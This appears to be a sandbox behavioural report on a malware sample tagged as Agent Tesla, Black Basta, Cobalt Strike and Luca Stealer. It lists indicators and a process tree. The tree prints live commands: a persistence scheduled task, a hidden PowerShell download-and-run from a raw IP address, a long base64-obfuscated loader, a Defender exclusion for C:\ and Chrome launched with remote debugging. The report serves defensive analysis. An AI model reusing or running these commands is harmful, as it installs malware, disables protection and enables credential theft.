pid Process 26964 reg.exe 5852 reg.exe 4912 reg.exe 19504 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3544 schtasks.exe 4236 schtasks.exe 2160 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5308 powershell.exe -
Suspicious behavior: EnumeratesProcesses 62 IoCs
pid Process 3852 powershell.exe 3852 powershell.exe 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 2980 rapes.exe 2980 rapes.exe 5308 powershell.exe 5308 powershell.exe 5128 powershell.exe 5128 powershell.exe 5128 powershell.exe 4424 MSBuild.exe 4424 MSBuild.exe 4424 MSBuild.exe 4424 MSBuild.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 4888 TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE 4888 TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE 6116 powershell.exe 6116 powershell.exe 5856 MSBuild.exe 5856 MSBuild.exe 6116 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 3624 powershell.exe 3624 powershell.exe 3624 powershell.exe 3536 powershell.exe 3536 powershell.exe 3536 powershell.exe 4396 MSBuild.exe 4396 MSBuild.exe 4396 MSBuild.exe 4396 MSBuild.exe 5856 MSBuild.exe 5856 MSBuild.exe 2924 chrome.exe 2924 chrome.exe 1532 483d2fa8a0d53818306efeb32d3.exe 1532 483d2fa8a0d53818306efeb32d3.exe 2284 202a17038f.exe 2284 202a17038f.exe 2284 202a17038f.exe 2284 202a17038f.exe 2284 202a17038f.exe 2284 202a17038f.exe 4008 Bell_Setup16.tmp 4008 Bell_Setup16.tmp 5760 regsvr32.exe 5760 regsvr32.exe 3996 powershell.exe 3996 powershell.exe 3996 powershell.exe 5856 MSBuild.exe 5856 MSBuild.exe 3404 PowerShell.exe 3404 PowerShell.exe 3404 PowerShell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 652 Process not Found 652 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 3852 powershell.exe Token: SeDebugPrivilege 5308 powershell.exe Token: SeDebugPrivilege 5128 powershell.exe Token: SeDebugPrivilege 1436 powershell.exe Token: SeDebugPrivilege 6116 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeShutdownPrivilege 2924 chrome.exe Token: SeCreatePagefilePrivilege 2924 chrome.exe Token: SeShutdownPrivilege 2924 chrome.exe Token: SeCreatePagefilePrivilege 2924 chrome.exe Token: SeShutdownPrivilege 2924 chrome.exe Token: SeCreatePagefilePrivilege 2924 chrome.exe Token: SeShutdownPrivilege 2924 chrome.exe Token: SeCreatePagefilePrivilege 2924 chrome.exe Token: SeShutdownPrivilege 2924 chrome.exe Token: SeCreatePagefilePrivilege 2924 chrome.exe Token: SeShutdownPrivilege 2924 chrome.exe Token: SeCreatePagefilePrivilege 2924 chrome.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeShutdownPrivilege 2924 chrome.exe Token: SeCreatePagefilePrivilege 2924 chrome.exe Token: SeIncreaseQuotaPrivilege 3996 powershell.exe Token: SeSecurityPrivilege 3996 powershell.exe Token: SeTakeOwnershipPrivilege 3996 powershell.exe Token: SeLoadDriverPrivilege 3996 powershell.exe Token: SeSystemProfilePrivilege 3996 powershell.exe Token: SeSystemtimePrivilege 3996 powershell.exe Token: SeProfSingleProcessPrivilege 3996 powershell.exe Token: SeIncBasePriorityPrivilege 3996 powershell.exe Token: SeCreatePagefilePrivilege 3996 powershell.exe Token: SeBackupPrivilege 3996 powershell.exe Token: SeRestorePrivilege 3996 powershell.exe Token: SeShutdownPrivilege 3996 powershell.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeSystemEnvironmentPrivilege 3996 powershell.exe Token: SeRemoteShutdownPrivilege 3996 powershell.exe Token: SeUndockPrivilege 3996 powershell.exe Token: SeManageVolumePrivilege 3996 powershell.exe Token: 33 3996 powershell.exe Token: 34 3996 powershell.exe Token: 35 3996 powershell.exe Token: 36 3996 powershell.exe Token: SeDebugPrivilege 3404 PowerShell.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3108 accde9cdf4.exe 3108 accde9cdf4.exe 3108 accde9cdf4.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 4008 Bell_Setup16.tmp -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3108 accde9cdf4.exe 3108 accde9cdf4.exe 3108 accde9cdf4.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2756 wrote to memory of 6108 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2756 wrote to memory of 6108 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2756 wrote to memory of 6108 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2756 wrote to memory of 6072 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2756 wrote to memory of 6072 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2756 wrote to memory of 6072 2756 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 6108 wrote to memory of 4236 6108 cmd.exe 90 PID 6108 wrote to memory of 4236 6108 cmd.exe 90 PID 6108 wrote to memory of 4236 6108 cmd.exe 90 PID 6072 wrote to memory of 3852 6072 mshta.exe 91 PID 6072 wrote to memory of 3852 6072 mshta.exe 91 PID 6072 wrote to memory of 3852 6072 mshta.exe 91 PID 3852 wrote to memory of 4884 3852 powershell.exe 100 PID 3852 wrote to memory of 4884 3852 powershell.exe 100 PID 3852 wrote to memory of 4884 3852 powershell.exe 100 PID 4884 wrote to memory of 2980 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 101 PID 4884 wrote to memory of 2980 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 101 PID 4884 wrote to memory of 2980 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 101 PID 2980 wrote to memory of 4032 2980 rapes.exe 105 PID 2980 wrote to memory of 4032 2980 rapes.exe 105 PID 2980 wrote to memory of 4032 2980 rapes.exe 105 PID 4032 wrote to memory of 3276 4032 cmd.exe 107 PID 4032 wrote to memory of 3276 4032 cmd.exe 107 PID 4032 wrote to memory of 3276 4032 cmd.exe 107 PID 3276 wrote to memory of 5308 3276 cmd.exe 109 PID 3276 wrote to memory of 5308 3276 cmd.exe 109 PID 3276 wrote to memory of 5308 3276 cmd.exe 109 PID 5308 wrote to memory of 5128 5308 powershell.exe 110 PID 5308 wrote to memory of 5128 5308 powershell.exe 110 PID 5308 wrote to memory of 5128 5308 powershell.exe 110 PID 2980 wrote to memory of 5592 2980 rapes.exe 112 PID 2980 wrote to memory of 5592 2980 rapes.exe 112 PID 2980 wrote to memory of 5592 2980 rapes.exe 112 PID 5592 wrote to memory of 1868 5592 amnew.exe 113 PID 5592 wrote to memory of 1868 5592 amnew.exe 113 PID 5592 wrote to memory of 1868 5592 amnew.exe 113 PID 2980 wrote to memory of 116 2980 rapes.exe 114 PID 2980 wrote to memory of 116 2980 rapes.exe 114 PID 2980 wrote to memory of 116 2980 rapes.exe 114 PID 116 wrote to memory of 6020 116 apple.exe 115 PID 116 wrote to memory of 6020 116 apple.exe 115 PID 116 wrote to memory of 6020 116 apple.exe 115 PID 6020 wrote to memory of 3104 6020 22.exe 117 PID 6020 wrote to memory of 3104 6020 22.exe 117 PID 3104 wrote to memory of 1224 3104 cmd.exe 119 PID 3104 wrote to memory of 1224 3104 cmd.exe 119 PID 3104 wrote to memory of 1224 3104 cmd.exe 119 PID 1224 wrote to memory of 5800 1224 22.exe 120 PID 1224 wrote to memory of 5800 1224 22.exe 120 PID 5800 wrote to memory of 4552 5800 cmd.exe 122 PID 5800 wrote to memory of 4552 5800 cmd.exe 122 PID 5800 wrote to memory of 2580 5800 cmd.exe 123 PID 5800 wrote to memory of 2580 5800 cmd.exe 123 PID 5800 wrote to memory of 3556 5800 cmd.exe 124 PID 5800 wrote to memory of 3556 5800 cmd.exe 124 PID 5800 wrote to memory of 3240 5800 cmd.exe 126 PID 5800 wrote to memory of 3240 5800 cmd.exe 126 PID 5800 wrote to memory of 4748 5800 cmd.exe 127 PID 5800 wrote to memory of 4748 5800 cmd.exe 127 PID 5800 wrote to memory of 1192 5800 cmd.exe 128 PID 5800 wrote to memory of 1192 5800 cmd.exe 128 PID 5800 wrote to memory of 5496 5800 cmd.exe 129 PID 5800 wrote to memory of 5496 5800 cmd.exe 129 PID 5800 wrote to memory of 1964 5800 cmd.exe 130 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn yDQgJmaxz4C /tr "mshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6108 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn yDQgJmaxz4C /tr "mshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4236
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Users\Admin\AppData\Local\Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE"C:\Users\Admin\AppData\Local\Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5128
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5592 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:384 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:2784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4424
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4016 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5856 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2924 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe4347dcf8,0x7ffe4347dd04,0x7ffe4347dd1011⤵PID:6132
-
-
